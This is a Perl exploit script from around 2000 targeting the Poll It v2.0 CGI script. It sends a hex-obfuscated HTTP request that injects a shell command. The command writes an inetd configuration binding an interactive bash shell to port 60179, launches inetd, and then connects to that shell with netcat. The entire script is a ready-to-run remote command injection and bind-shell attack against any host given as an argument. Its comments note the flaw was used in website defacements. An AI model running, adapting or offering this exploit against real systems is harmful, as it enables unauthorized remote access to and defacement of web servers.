#!/usr/bin/perl -w ## Poll It v2.0 CGI / Proof of Conecept Exploit. ## ## The flaw in Poll It v2.0 has supposedly been ## used in many of the latest defacements. ## ## Credit to Elias Levy for explaining how the ## CGI script could be exploited in his post to ## Bugtraw. Thanks to Chris Gunso for tips and ## testing. ## ## The exploit will bind a shell to port 60179 ## (fido) using inetd. ## ## Written by teleh0r@doglover.com / anno 2000 use strict; use Socket; if (@ARGV < 1) { print("Usage: $0 <target>\n"); exit(1); } my($target,$agent,$evilcode,$sploit,$iaddr, $paddr,$proto); $target = $ARGV[0]; print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/pollit.pl\n"); $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; # echo '60179 stream tcp nowait nobody /bin/bash bash -i' > # /tmp/.hass; /usr/sbin/inetd /tmp/.hass $evilcode = # Poll It v2.0 CGI Portbinding CGI code (TM) / heh "\x61\x64\x6d\x69\x6e\x5f\x70\x61\x73\x73\x77\x6f\x72". "\x64\x3d\x68\x61\x73\x73\x26\x65\x6e\x74\x65\x72\x65". "\x64\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x68\x61". "\x73\x73\x26\x61\x63\x74\x69\x6f\x6e\x3d\x61\x64\x64". "\x5f\x6f\x70\x74\x69\x6f\x6e\x26\x61\x64\x64\x5f\x6f". "\x70\x74\x69\x6f\x6e\x3d\x31\x26\x70\x6f\x6c\x6c\x5f". "\x6f\x70\x74\x69\x6f\x6e\x73\x3d\x65\x63\x68\x6f\x2b". "\x27\x36\x30\x31\x37\x39\x2b\x73\x74\x72\x65\x61\x6d". "\x2b\x74\x63\x70\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e". "\x6f\x62\x6f\x64\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61". "\x73\x68\x2b\x62\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e". "\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f". "\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74". "\x64\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c"; # You may have to change both the path to the script, # as well as the name of the script name. $sploit = "GET /cgi-bin/poll.cgi?$evilcode HTTP/1.0 Connection: close User-Agent: $agent Host: $target Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); sleep(5); system("nc -w 10 $target 60179"); exit(0);